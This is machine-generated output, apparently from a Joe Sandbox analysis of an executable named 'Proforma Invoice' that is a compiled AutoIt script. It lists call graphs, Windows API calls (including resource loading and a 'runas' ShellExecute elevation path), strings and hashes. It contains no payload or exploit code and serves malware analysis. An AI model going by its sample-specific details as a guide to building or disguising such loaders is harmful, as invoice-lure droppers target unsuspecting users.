102738->102740 102746 6cd676 102739->102746 102749 6cd7a5 102739->102749 102740->102685 102741 6cd86d 102828 6cd87d LeaveCriticalSection _doexit 102741->102828 102743 6c87d5 __calloc_crt 58 API calls 102743->102746 102744 6cd7f2 GetStdHandle 102744->102749 102745 6cd805 GetFileType 102745->102749 102746->102743 102748 6cd6c4 102746->102748 102746->102749 102747 6cd6f8 GetFileType 102747->102748 102748->102747 102748->102749 102826 6c9e2b InitializeCriticalSectionAndSpinCount 102748->102826 102749->102741 102749->102744 102749->102745 102827 6c9e2b InitializeCriticalSectionAndSpinCount 102749->102827 102753 6c7d06 102752->102753 102754 6d4f34 102752->102754 102758 6d4b1b GetModuleFileNameW 102753->102758 102829 6c881d 58 API calls 2 library calls 102754->102829 102756 6d4f70 FreeEnvironmentStringsW 102756->102753 102757 6d4f5a _memmove 102757->102756 102759 6d4b4f _wparse_cmdline 102758->102759 102761 6d4b8f _wparse_cmdline 102759->102761 102830 6c881d 58 API calls 2 library calls 102759->102830 102761->102692 102763 6d4d69 102762->102763 102764 6d4d71 __NMSG_WRITE 102762->102764 102763->102696 102765 6c87d5 __calloc_crt 58 API calls 102764->102765 102769 6d4d9a __NMSG_WRITE 102765->102769 102766 6d4df1 102767 6c2d55 _free 58 API calls 102766->102767 102767->102763 102768 6c87d5 __calloc_crt 58 API calls 102768->102769 102769->102763 102769->102766 102769->102768 102770 6d4e16 102769->102770 102773 6d4e2d 102769->102773 102831 6d4607 58 API calls 2 library calls 102769->102831 102771 6c2d55 _free 58 API calls 102770->102771 102771->102763 102832 6c8dc6 IsProcessorFeaturePresent 102773->102832 102775 6d4e39 102775->102696 102777 6c30fb __IsNonwritableInCurrentImage 102776->102777 102847 6ca4d1 102777->102847 102779 6c3119 __initterm_e 102780 6c2d40 __cinit 67 API calls 102779->102780 102781 6c3138 _doexit __IsNonwritableInCurrentImage 102779->102781 102780->102781 102781->102700 102783 6a47ea 102782->102783 102793 6a4889 102782->102793 102784 6a4824 IsThemeActive 102783->102784 102850 6c336c 102784->102850 102788 6a4850 102862 6a48fd SystemParametersInfoW SystemParametersInfoW 102788->102862 102790 6a485c 102863 6a3b3a 102790->102863 102793->102704 102794->102678 102795->102682 102796->102690 102800->102705 102801->102708 102802->102714 102803->102716 102804->102720 102805->102721 102807 6c87dc 102806->102807 102809 6c8817 102807->102809 102811 6c87fa 102807->102811 102815 6d51f6 102807->102815 102809->102725 102812 6c9de6 TlsSetValue 102809->102812 102811->102807 102811->102809 102823 6ca132 Sleep 102811->102823 102812->102729 102813->102732 102814->102728 102816 6d5201 102815->102816 102822 6d521c 102815->102822 102817 6d520d 102816->102817 102816->102822 102824 6c8b28 58 API calls __getptd_noexit 102817->102824 102819 6d522c HeapAlloc 102821 6d5212 102819->102821 102819->102822 102821->102807 102822->102819 102822->102821 102825 6c33a1 DecodePointer 102822->102825 102823->102811 102824->102821 102825->102822 102826->102748 102827->102749 102828->102740 102829->102757 102830->102761 102831->102769 102833 6c8dd1 102832->102833 102838 6c8c59 102833->102838 102837 6c8dec 102837->102775 102839 6c8c73 _memset __call_reportfault 102838->102839 102840 6c8c93 IsDebuggerPresent 102839->102840 102846 6ca155 SetUnhandledExceptionFilter UnhandledExceptionFilter 102840->102846 102842 6cc5f6 __87except 6 API calls 102843 6c8d7a 102842->102843 102845 6ca140 GetCurrentProcess TerminateProcess 102843->102845 102844 6c8d57 __call_reportfault 102844->102842 102845->102837 102846->102844 102848 6ca4d4 EncodePointer 102847->102848 102848->102848 102849 6ca4ee 102848->102849 102849->102779 102851 6c9c0b __lock 58 API calls 102850->102851 102852 6c3377 DecodePointer EncodePointer 102851->102852 102915 6c9d75 LeaveCriticalSection 102852->102915 102854 6a4849 102855 6c33d4 102854->102855 102856 6c33de 102855->102856 102857 6c33f8 102855->102857 102856->102857 102916 6c8b28 58 API calls __getptd_noexit 102856->102916 102857->102788 102859 6c33e8 102917 6c8db6 9 API calls __write 102859->102917 102861 6c33f3 102861->102788 102862->102790 102864 6a3b47 __write_nolock 102863->102864 102865 6a7667 59 API calls 102864->102865 102866 6a3b51 GetCurrentDirectoryW 102865->102866 102918 6a3766 102866->102918 102915->102854 102916->102859 102917->102861 102919 6a7667 59 API calls 102918->102919 102920 6a377c 102919->102920 103119 6a3d31 102920->103119 102922 6a379a 102923 6a4706 61 API calls 102922->102923 102924 6a37ae 102923->102924 102925 6a7de1 59 API calls 102924->102925 102926 6a37bb 102925->102926 102927 6a4ddd 136 API calls 102926->102927 102928 6a37d4 102927->102928 102929 6a37dc Mailbox 102928->102929 102930 6dd173 102928->102930 102934 6a8047 59 API calls 102929->102934 103161 70955b 102930->103161 102933 6dd192 102936 6c2d55 _free 58 API calls 102933->102936 102937 6a37ef 102934->102937 102935 6a4e4a 84 API calls 102935->102933 102938 6dd19f 102936->102938 103133 6a928a 102937->103133 102940 6a4e4a 84 API calls 102938->102940 102942 6dd1a8 102940->102942 102946 6a3ed0 59 API calls 102942->102946 102943 6a7de1 59 API calls 102944 6a3808 102943->102944 102945 6a84c0 69 API calls 102944->102945 102947 6a381a Mailbox 102945->102947 102948 6dd1c3 102946->102948 102949 6a7de1 59 API calls 102947->102949 102950 6a3ed0 59 API calls 102948->102950 102951 6a3840 102949->102951 102952 6dd1df 102950->102952 102953 6a84c0 69 API calls 102951->102953 102954 6a4706 61 API calls 102952->102954 102956 6a384f Mailbox 102953->102956 102955 6dd204 102954->102955 102957 6a3ed0 59 API calls 102955->102957 102959 6a7667 59 API calls 102956->102959 102958 6dd210 102957->102958 102960 6a8047 59 API calls 102958->102960 102961 6a386d 102959->102961 102962 6dd21e 102960->102962 103136 6a3ed0 102961->103136 102964 6a3ed0 59 API calls 102962->102964 102966 6dd22d 102964->102966 102968 6a3887 102968->102942 103120 6a3d3e __write_nolock 103119->103120 103121 6a7bcc 59 API calls 103120->103121 103126 6a3ea4 Mailbox 103120->103126 103123 6a3d70 103121->103123 103122 6a79f2 59 API calls 103122->103123 103123->103122 103130 6a3da6 Mailbox 103123->103130 103124 6a79f2 59 API calls 103124->103130 103125 6a3e77 103125->103126 103127 6a7de1 59 API calls 103125->103127 103126->102922 103128 6a3e98 103127->103128 103131 6a3f74 59 API calls 103128->103131 103129 6a7de1 59 API calls 103129->103130 103130->103124 103130->103125 103130->103126 103130->103129 103132 6a3f74 59 API calls 103130->103132 103131->103126 103132->103130 103134 6c0db6 Mailbox 59 API calls 103133->103134 103135 6a37fb 103134->103135 103135->102943 103137 6a3eda 103136->103137 103138 6a3ef3 103136->103138 103139 6a8047 59 API calls 103137->103139 103140 6a7bcc 59 API calls 103138->103140 103141 6a3879 103139->103141 103140->103141 103142 6c2efd 103141->103142 103143 6c2f7e 103142->103143 103144 6c2f09 103142->103144 103198 6c2f90 60 API calls 4 library calls 103143->103198 103151 6c2f2e 103144->103151 103196 6c8b28 58 API calls __getptd_noexit 103144->103196 103147 6c2f8b 103147->102968 103148 6c2f15 103151->102968 103162 6a4ee5 85 API calls 103161->103162 103163 7095ca 103162->103163 103164 709734 96 API calls 103163->103164 103165 7095dc 103164->103165 103166 6a4f0b 74 API calls 103165->103166 103194 6dd186 103165->103194 103167 7095f7 103166->103167 103168 6a4f0b 74 API calls 103167->103168 103169 709607 103168->103169 103170 6a4f0b 74 API calls 103169->103170 103171 709622 103170->103171 103172 6a4f0b 74 API calls 103171->103172 103173 70963d 103172->103173 103174 6a4ee5 85 API calls 103173->103174 103175 709654 103174->103175 103176 6c571c __crtLCMapStringA_stat 58 API calls 103175->103176 103177 70965b 103176->103177 103178 6c571c __crtLCMapStringA_stat 58 API calls 103177->103178 103179 709665 103178->103179 103180 6a4f0b 74 API calls 103179->103180 103181 709679 103180->103181 103182 709109 GetSystemTimeAsFileTime 103181->103182 103183 70968c 103182->103183 103194->102933 103194->102935 103196->103148 103198->103147 103477 6a1066 103482 6af76f 103477->103482 103479 6a106c 103480 6c2d40 __cinit 67 API calls 103479->103480 103481 6a1076 103480->103481 103483 6af790 103482->103483 103515 6bff03 103483->103515 103487 6af7d7 103488 6a7667 59 API calls 103487->103488 103489 6af7e1 103488->103489 103490 6a7667 59 API calls 103489->103490 103491 6af7eb 103490->103491 103492 6a7667 59 API calls 103491->103492 103493 6af7f5 103492->103493 103494 6a7667 59 API calls 103493->103494 103495 6af833 103494->103495 103496 6a7667 59 API calls 103495->103496 103497 6af8fe 103496->103497 103525 6b5f87 103497->103525 103501 6af930 103502 6a7667 59 API calls 103501->103502 103503 6af93a 103502->103503 103553 6bfd9e 103503->103553 103505 6af981 103506 6af991 GetStdHandle 103505->103506 103507 6e45ab 103506->103507 103508 6af9dd 103506->103508 103507->103508 103510 6e45b4 103507->103510 103509 6af9e5 OleInitialize 103508->103509 103509->103479 103560 706b38 64 API calls Mailbox 103510->103560 103512 6e45bb 103561 707207 CreateThread 103512->103561 103514 6e45c7 CloseHandle 103514->103509 103562 6bffdc 103515->103562 103518 6bffdc 59 API calls 103519 6bff45 103518->103519 103520 6a7667 59 API calls 103519->103520 103521 6bff51 103520->103521 103522 6a7bcc 59 API calls 103521->103522 103523 6af796 103522->103523 103524 6c0162 6 API calls 103523->103524 103524->103487 103526 6a7667 59 API calls 103525->103526 103527 6b5f97 103526->103527 103528 6a7667 59 API calls 103527->103528 103529 6b5f9f 103528->103529 103569 6b5a9d 103529->103569 103532 6b5a9d 59 API calls 103533 6b5faf 103532->103533 103534 6a7667 59 API calls 103533->103534 103535 6b5fba 103534->103535 103536 6c0db6 Mailbox 59 API calls 103535->103536 103537 6af908 103536->103537 103538 6b60f9 103537->103538 103539 6b6107 103538->103539 103540 6a7667 59 API calls 103539->103540 103541 6b6112 103540->103541 103542 6a7667 59 API calls 103541->103542 103543 6b611d 103542->103543 103544 6a7667 59 API calls 103543->103544 103545 6b6128 103544->103545 103546 6a7667 59 API calls 103545->103546 103547 6b6133 103546->103547 103548 6b5a9d 59 API calls 103547->103548 103549 6b613e 103548->103549 103550 6c0db6 Mailbox 59 API calls 103549->103550 103551 6b6145 RegisterWindowMessageW 103550->103551 103551->103501 103554 6f576f 103553->103554 103555 6bfdae 103553->103555 103572 709ae7 60 API calls 103554->103572 103557 6c0db6 Mailbox 59 API calls 103555->103557 103558 6bfdb6 103557->103558 103558->103505 103559 6f577a 103560->103512 103561->103514 103573 7071ed 65 API calls 103561->103573 103563 6a7667 59 API calls 103562->103563 103564 6bffe7 103563->103564 103565 6a7667 59 API calls 103564->103565 103566 6bffef 103565->103566 103567 6a7667 59 API calls 103566->103567 103568 6bff3b 103567->103568 103568->103518 103570 6a7667 59 API calls 103569->103570 103571 6b5aa5 103570->103571 103571->103532 103572->103559 103574 6a1016 103579 6a4974 103574->103579 103577 6c2d40 __cinit 67 API calls 103578 6a1025 103577->103578 103580 6c0db6 Mailbox 59 API calls 103579->103580 103581 6a497c 103580->103581 103582 6a101b 103581->103582 103586 6a4936 103581->103586 103582->103577 103587 6a493f 103586->103587 103589 6a4951 103586->103589 103588 6c2d40 __cinit 67 API calls 103587->103588 103588->103589 103590 6a49a0 103589->103590 103591 6a7667 59 API calls 103590->103591 103592 6a49b8 GetVersionExW 103591->103592 103593 6a7bcc 59 API calls 103592->103593 103594 6a49fb 103593->103594 103595 6a7d2c 59 API calls 103594->103595 103602 6a4a28 103594->103602 103596 6a4a1c 103595->103596 103597 6a7726 59 API calls 103596->103597 103597->103602 103598 6a4a93 GetCurrentProcess IsWow64Process 103599 6a4aac 103598->103599 103600 6a4b2b GetSystemInfo 103599->103600 103601 6a4ac2 103599->103601 103605 6a4af8 103600->103605 103614 6a4b37 103601->103614 103602->103598 103603 6dd864 103602->103603 103605->103582 103607 6a4b1f GetSystemInfo 103610 6a4ae9 103607->103610 103608 6a4ad4 103609 6a4b37 2 API calls 103608->103609 103611 6a4adc GetNativeSystemInfo 103609->103611 103610->103605 103612 6a4aef FreeLibrary 103610->103612 103611->103610 103612->103605 103615 6a4ad0 103614->103615 103616 6a4b40 LoadLibraryA 103614->103616 103615->103607 103615->103608 103616->103615 103617 6a4b51 GetProcAddress 103616->103617 103617->103615 103618 6a1055 103623 6a2649 103618->103623 103621 6c2d40 __cinit 67 API calls 103622 6a1064 103621->103622 103624 6a7667 59 API calls 103623->103624 103625 6a26b7 103624->103625 103630 6a3582 103625->103630 103627 6a2754 103628 6a105a 103627->103628 103633 6a3416 59 API calls 2 library calls 103627->103633 103628->103621 103634 6a35b0 103630->103634 103633->103627 103635 6a35a1 103634->103635 103636 6a35bd 103634->103636 103635->103627 103636->103635 103637 6a35c4 RegOpenKeyExW 103636->103637 103637->103635 103638 6a35de RegQueryValueExW 103637->103638 103639 6a3614 RegCloseKey 103638->103639 103640 6a35ff 103638->103640 103639->103635 103640->103639

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006A3B68
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 006A3B7A
                                                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,007652F8,007652E0,?,?), ref: 006A3BEB
                                                                                                  • Part of subcall function 006A7BCC: _memmove.LIBCMT ref: 006A7C06
                                                                                                  • Part of subcall function 006B092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,006A3C14,007652F8,?,?,?), ref: 006B096E
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 006A3C6F
                                                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00757770,00000010), ref: 006DD281
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,007652F8,?,?,?), ref: 006DD2B9
                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00754260,007652F8,?,?,?), ref: 006DD33F
                                                                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 006DD346
                                                                                                  • Part of subcall function 006A3A46: GetSysColorBrush.USER32(0000000F), ref: 006A3A50
                                                                                                  • Part of subcall function 006A3A46: LoadCursorW.USER32(00000000,00007F00), ref: 006A3A5F
                                                                                                  • Part of subcall function 006A3A46: LoadIconW.USER32(00000063), ref: 006A3A76
                                                                                                  • Part of subcall function 006A3A46: LoadIconW.USER32(000000A4), ref: 006A3A88
                                                                                                  • Part of subcall function 006A3A46: LoadIconW.USER32(000000A2), ref: 006A3A9A
                                                                                                  • Part of subcall function 006A3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006A3AC0
                                                                                                  • Part of subcall function 006A3A46: RegisterClassExW.USER32(?), ref: 006A3B16
                                                                                                  • Part of subcall function 006A39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006A3A03
                                                                                                  • Part of subcall function 006A39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006A3A24
                                                                                                  • Part of subcall function 006A39D5: ShowWindow.USER32(00000000,?,?), ref: 006A3A38
                                                                                                  • Part of subcall function 006A39D5: ShowWindow.USER32(00000000,?,?), ref: 006A3A41
                                                                                                  • Part of subcall function 006A434A: _memset.LIBCMT ref: 006A4370
                                                                                                  • Part of subcall function 006A434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006A4415
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                • String ID: This is a third-party compiled AutoIt script.$runas$%s
                                                                                                • API String ID: 529118366-1632493683
                                                                                                • Opcode ID: dbb066ae5d248ddb0863179172a5f793ee6f99c4a6aadb0ebaa7b7b71d65784f
                                                                                                • Instruction ID: 95a25beaf68361fc22ce2bf5f46464c684aad333e69ffed89a6ffa1c0fdd078d
                                                                                                • Opcode Fuzzy Hash: dbb066ae5d248ddb0863179172a5f793ee6f99c4a6aadb0ebaa7b7b71d65784f
                                                                                                • Instruction Fuzzy Hash: 1451F9B0D04248AEDB11FBB4DC15EED7B7ABF46710F008069F41366252DAB85E46DF29

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1037 6a49a0-6a4a00 call 6a7667 GetVersionExW call 6a7bcc 1042 6a4b0b-6a4b0d 1037->1042 1043 6a4a06 1037->1043 1045 6dd767-6dd773 1042->1045 1044 6a4a09-6a4a0e 1043->1044 1047 6a4b12-6a4b13 1044->1047 1048 6a4a14 1044->1048 1046 6dd774-6dd778 1045->1046 1049 6dd77b-6dd787 1046->1049 1050 6dd77a 1046->1050 1051 6a4a15-6a4a4c call 6a7d2c call 6a7726 1047->1051 1048->1051 1049->1046 1052 6dd789-6dd78e 1049->1052 1050->1049 1060 6a4a52-6a4a53 1051->1060 1061 6dd864-6dd867 1051->1061 1052->1044 1054 6dd794-6dd79b 1052->1054 1054->1045 1056 6dd79d 1054->1056 1059 6dd7a2-6dd7a5 1056->1059 1062 6dd7ab-6dd7c9 1059->1062 1063 6a4a93-6a4aaa GetCurrentProcess IsWow64Process 1059->1063 1060->1059 1064 6a4a59-6a4a64 1060->1064 1065 6dd869 1061->1065 1066 6dd880-6dd884 1061->1066 1062->1063 1067 6dd7cf-6dd7d5 1062->1067 1073 6a4aaf-6a4ac0 1063->1073 1074 6a4aac 1063->1074 1068 6a4a6a-6a4a6c 1064->1068 1069 6dd7ea-6dd7f0 1064->1069 1070 6dd86c 1065->1070 1071 6dd86f-6dd878 1066->1071 1072 6dd886-6dd88f 1066->1072 1077 6dd7df-6dd7e5 1067->1077 1078 6dd7d7-6dd7da 1067->1078 1079 6dd805-6dd811 1068->1079 1080 6a4a72-6a4a75 1068->1080 1081 6dd7fa-6dd800 1069->1081 1082 6dd7f2-6dd7f5 1069->1082 1070->1071 1071->1066 1072->1070 1083 6dd891-6dd894 1072->1083 1075 6a4b2b-6a4b35 GetSystemInfo 1073->1075 1076 6a4ac2-6a4ad2 call 6a4b37 1073->1076 1074->1073 1089 6a4af8-6a4b08 1075->1089 1094 6a4b1f-6a4b29 GetSystemInfo 1076->1094 1095 6a4ad4-6a4ae1 call 6a4b37 1076->1095 1077->1063 1078->1063 1084 6dd81b-6dd821 1079->1084 1085 6dd813-6dd816 1079->1085 1087 6a4a7b-6a4a8a 1080->1087 1088 6dd831-6dd834 1080->1088 1081->1063 1082->1063 1083->1071 1084->1063 1085->1063 1092 6a4a90 1087->1092 1093 6dd826-6dd82c 1087->1093 1088->1063 1091 6dd83a-6dd84f 1088->1091 1096 6dd859-6dd85f 1091->1096 1097 6dd851-6dd854 1091->1097 1092->1063 1093->1063 1099 6a4ae9-6a4aed 1094->1099 1102 6a4b18-6a4b1d 1095->1102 1103 6a4ae3-6a4ae7 GetNativeSystemInfo 1095->1103 1096->1063 1097->1063 1099->1089 1101 6a4aef-6a4af2 FreeLibrary 1099->1101 1101->1089 1102->1103 1103->1099
                                                                                                APIs
                                                                                                • GetVersionExW.KERNEL32(?), ref: 006A49CD
                                                                                                  • Part of subcall function 006A7BCC: _memmove.LIBCMT ref: 006A7C06
                                                                                                • GetCurrentProcess.KERNEL32(?,0072FAEC,00000000,00000000,?), ref: 006A4A9A
                                                                                                • IsWow64Process.KERNEL32(00000000), ref: 006A4AA1
                                                                                                • GetNativeSystemInfo.KERNELBASE(00000000), ref: 006A4AE7
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 006A4AF2
                                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 006A4B23
                                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 006A4B2F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 1986165174-0
                                                                                                • Opcode ID: 4bc715814643ebf200cf1656a9baf25731e89a280ba627274412472558a58df7
                                                                                                • Instruction ID: c3fee00f00cfc1845ff8536d0c8fdaf9864c808563179162a29f81eafe71b7d8
                                                                                                • Opcode Fuzzy Hash: 4bc715814643ebf200cf1656a9baf25731e89a280ba627274412472558a58df7
                                                                                                • Instruction Fuzzy Hash: 9D91D8319897C0DEC731EB6888501EAFFF6AF6A300F4449AED0C753B01D661A908DB6D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1104 6a4e89-6a4ea1 CreateStreamOnHGlobal 1105 6a4ea3-6a4eba FindResourceExW 1104->1105 1106 6a4ec1-6a4ec6 1104->1106 1107 6a4ec0 1105->1107 1108 6dd933-6dd942 LoadResource 1105->1108 1107->1106 1108->1107 1109 6dd948-6dd956 SizeofResource 1108->1109 1109->1107 1110 6dd95c-6dd967 LockResource 1109->1110 1110->1107 1111 6dd96d-6dd975 1110->1111 1112 6dd979-6dd98b 1111->1112 1112->1107
                                                                                                APIs
                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,006A4D8E,?,?,00000000,00000000), ref: 006A4E99
                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,006A4D8E,?,?,00000000,00000000), ref: 006A4EB0
                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,006A4D8E,?,?,00000000,00000000,?,?,?,?,?,?,006A4E2F), ref: 006DD937
                                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,006A4D8E,?,?,00000000,00000000,?,?,?,?,?,?,006A4E2F), ref: 006DD94C
                                                                                                • LockResource.KERNEL32(006A4D8E,?,?,006A4D8E,?,?,00000000,00000000,?,?,?,?,?,?,006A4E2F,00000000), ref: 006DD95F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                • String ID: SCRIPT
                                                                                                • API String ID: 3051347437-3967369404
                                                                                                • Opcode ID: 2a2a9c1caae85e503c8c5b39265de8b276e5bd734989d88ee5144764ebfabc61
                                                                                                • Instruction ID: 96518a944703a00b26529721819b9ba620e459887c084374f01509554ac2d8a3
                                                                                                • Opcode Fuzzy Hash: 2a2a9c1caae85e503c8c5b39265de8b276e5bd734989d88ee5144764ebfabc61
                                                                                                • Instruction Fuzzy Hash: 91115E75240700BFD7219B65EC48F677BBAFBC6B11F108278F405D6250DBB1EC018A60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Ddv$Ddv$Ddv$Ddv$Variable must be of type 'Object'.
                                                                                                • API String ID: 0-1189019815
                                                                                                • Opcode ID: 377f6c0f41ecb580fb959ae721c2c9690c0b7b2843de69ae14971267976f7d30
                                                                                                • Instruction ID: ea63eb31686fb690accd7ef90abca159e3daaf8c230cabac74ade04e36c940f3
                                                                                                • Opcode Fuzzy Hash: 377f6c0f41ecb580fb959ae721c2c9690c0b7b2843de69ae14971267976f7d30
                                                                                                • Instruction Fuzzy Hash: 20A29E74A00215CFCB24EF58C494AAAB7B3FF5A310F648069E906AB351D776ED42CF91
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(?,006DE398), ref: 0070446A
                                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 0070447B
                                                                                                • FindClose.KERNEL32(00000000), ref: 0070448B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                • String ID:
                                                                                                • API String ID: 48322524-0
                                                                                                • Opcode ID: a6ba76f7970a1a4f0f71d79d2a6fcf9898cbb4ffcf362ee4779f87cf29e08dd2
                                                                                                • Instruction ID: a44c1326fe3941aefda3e8c9761e2cf92a6caf20821848b6bf083bfa65e4a909
                                                                                                • Opcode Fuzzy Hash: a6ba76f7970a1a4f0f71d79d2a6fcf9898cbb4ffcf362ee4779f87cf29e08dd2
                                                                                                • Instruction Fuzzy Hash: B3E0D872410540E78220AB38EC0D8ED77ECEE06335F10472AF935C10D0E77C5D009599
                                                                                                APIs
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006B0A5B
                                                                                                • timeGetTime.WINMM ref: 006B0D16
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006B0E53
                                                                                                • Sleep.KERNEL32(0000000A), ref: 006B0E61
                                                                                                • LockWindowUpdate.USER32(00000000,?,?), ref: 006B0EFA
                                                                                                • DestroyWindow.USER32 ref: 006B0F06
                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006B0F20
                                                                                                • Sleep.KERNEL32(0000000A,?,?), ref: 006E4E83
                                                                                                • TranslateMessage.USER32(?), ref: 006E5C60
                                                                                                • DispatchMessageW.USER32(?), ref: 006E5C6E
                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006E5C82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
